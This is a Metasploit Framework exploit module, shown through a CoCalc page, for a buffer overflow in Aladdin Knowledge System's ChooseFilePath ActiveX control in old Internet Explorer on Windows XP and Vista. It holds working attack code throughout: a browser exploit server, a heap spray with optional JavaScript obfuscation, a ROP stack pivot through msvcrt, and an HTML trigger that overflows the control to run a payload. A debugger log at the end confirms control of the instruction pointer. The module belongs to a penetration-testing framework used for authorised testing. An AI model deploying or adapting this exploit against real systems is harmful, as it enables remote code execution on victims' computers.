Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
19715 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::BrowserExploitServer

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => "Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow",

16
        'Description' => %q{

17
          This module exploits a vulnerability found in Aladdin Knowledge System's

18
          ActiveX component.  By supplying a long string of data to the ChooseFilePath()

19
          function, a buffer overflow occurs, which may result in remote code execution

20
          under the context of the user.

21
        },

22
        'License' => MSF_LICENSE,

23
        'Author' => [

24
          'shinnai', # Vulnerability Discovery

25
          'b33f',          # Original exploit

26
          'sinn3r',        # Metasploit

27
          'juan vazquez'   # Metasploit, IE8 target

28
        ],

29
        'References' => [

30
          [ 'OSVDB', '86723' ],

31
          [ 'EDB', '22258' ],

32
          [ 'EDB', '22301' ]

33
        ],

34
        'Payload' => {

35
          'StackAdjustment' => -3500

36
        },

37
        'DefaultOptions' => {

38
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'

39
        },

40
        'Platform' => 'win',

41
        'BrowserRequirements' => {

42
          :source => /script|headers/i,

43
          :activex => [

44
            {

45
              clsid: "{09F68A41-2FBE-11D3-8C9D-0008C7D901B6}",

46
              method: "ChooseFilePath"

47
            }

48
          ],

49
          :os_name => OperatingSystems::Match::WINDOWS,

50
        },

51
        'Targets' => [

52
          [ 'Automatic', {} ],

53
          [

54
            'Windows XP with IE 6',

55
            {

56
              'os_name' => OperatingSystems::Match::WINDOWS_XP,

57
              'ua_name' => 'MSIE',

58
              'ua_ver' => '6.0',

59
              'Rop' => false,

60
              'Offset' => '0x5F4',

61
              'Ret' => 0x0c0c0c0c

62
            }

63
          ],

64
          [

65
            'Windows XP with IE 7',

66
            {

67
              'os_name' => OperatingSystems::Match::WINDOWS_XP,

68
              'ua_name' => 'MSIE',

69
              'ua_ver' => '7.0',

70
              'Rop' => false,

71
              'Offset' => '0x5F4',

72
              'Ret' => 0x0c0c0c0c

73
            }

74
          ],

75
          [

76
            'Windows XP with IE 8',

77
            {

78
              'os_name' => OperatingSystems::Match::WINDOWS_XP,

79
              'ua_name' => 'MSIE',

80
              'ua_ver' => '8.0',

81
              'Rop' => true,

82
              'Offset' => '0x5f6',

83
              'Ret' => 0x77c2282e # stackpivot # mov esp,ebp # pop ebp # retn # msvcrt.dll

84
            }

85
          ],

86
          [

87
            'Windows Vista with IE 7',

88
            {

89
              'os_name' => OperatingSystems::Match::WINDOWS_VISTA,

90
              'ua_name' => 'MSIE',

91
              'ua_ver' => '7.0',

92
              'Rop' => false,

93
              'Offset' => '0x5F4',

94
              'Ret' => 0x0c0c0c0c

95
            }

96
          ]

97


98
        ],

99
        'Privileged' => false,

100
        'DisclosureDate' => '2012-04-01',

101
        'DefaultTarget' => 0,

102
        'Notes' => {

103
          'Reliability' => UNKNOWN_RELIABILITY,

104
          'Stability' => UNKNOWN_STABILITY,

105
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

106
        }

107
      )

108
    )

109


110
    register_options(

111
      [

112
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])

113
      ], self.class

114
    )

115
  end

116


117
  def ie_heap_spray(p)

118
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(get_target.arch))

119
    js_nops = Rex::Text.to_unescape("\x0c" * 4, Rex::Arch.endian(get_target.arch))

120
    randnop = rand_text_alpha(rand(100) + 1)

121


122
    # Land the payload at 0x0c0c0c0c

123


124
    js = %Q|

125
    var heap_obj = new heapLib.ie(0x20000);

126
    var code = unescape("#{js_code}");

127
    var #{randnop} = "#{js_nops}";

128
    var nops = unescape(#{randnop});

129
    while (nops.length < 0x80000) nops += nops;

130
    var offset = nops.substring(0, #{get_target['Offset']});

131
    var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

132
    while (shellcode.length < 0x40000) shellcode += shellcode;

133
    var block = shellcode.substring(0, (0x80000-6)/2);

134
    heap_obj.gc();

135
    for (var i=1; i < 0x300; i++) {

136
      heap_obj.alloc(block);

137
    }

138
    |

139


140
    js = heaplib(js, { :noobfu => true })

141


142
    if datastore['OBFUSCATE']

143
      js = ::Rex::Exploitation::JSObfu.new(js)

144
      js.obfuscate(memory_sensitive: true)

145
    end

146


147
    return js

148
  end

149


150
  def exploit_template(cli, target_info)

151
    if get_target['Rop']

152
      p = generate_rop_payload('msvcrt', get_payload(cli, target_info), { 'target' => 'xp' })

153
    else

154
      p = get_payload(cli, target_info)

155
    end

156


157
    spray = ie_heap_spray(p)

158
    target_ret = Rex::Text.to_hex([get_target.ret].pack("V"))

159


160
    html_template = %Q|

161
    <html>

162
    <object id="pwnd" classid="clsid:09F68A41-2FBE-11D3-8C9D-0008C7D901B6"></object>

163
    <script>

164
    <%=spray%>

165
    junk='';

166
    for( counter=0; counter<=267; counter++) junk+=unescape("%0c");

167
    pwnd.ChooseFilePath(junk + "<%=target_ret%>");

168
    </script>

169
    </html>

170
    |

171


172
    return html_template, binding()

173
  end

174


175
  def on_request_exploit(cli, request, target_info)

176
    print_status("Sending HTML...")

177
    send_exploit_html(cli, exploit_template(cli, target_info))

178
  end

179
end

180


181
=begin

182
0:008> g

183
(82c.12dc): Access violation - code c0000005 (first chance)

184
First chance exceptions are reported before any exception handling.

185
This exception may be expected and handled.

186
eax=0c0c0c0c ebx=00001d56 ecx=020b93d4 edx=00001d56 esi=00001d60 edi=020b93e8

187
eip=7712a41a esp=020b93bc ebp=020b93c4 iopl=0         nv up ei pl zr na pe nc

188
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246

189
OLEAUT32!SysReAllocStringLen+0x31:

190
7712a41a 8b00            mov     eax,dword ptr [eax]  ds:0023:0c0c0c0c=????????

191
0:008> g

192
(82c.12dc): Access violation - code c0000005 (first chance)

193
First chance exceptions are reported before any exception handling.

194
This exception may be expected and handled.

195
eax=00000000 ebx=00000000 ecx=0c0c0c0c edx=7c9032bc esi=00000000 edi=00000000

196
eip=0c0c0c0c esp=020b8fec ebp=020b900c iopl=0         nv up ei pl zr na pe nc

197
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246

198
0c0c0c0c ??              ???

199
0:008> db 020bf798

200
020bf798  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................

201
020bf7a8  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................

202
020bf7b8  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................

203
020bf7c8  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................

204
020bf7d8  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................

205
020bf7e8  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................

206
020bf7f8  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................

207
020bf808  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................

208
=end

209


210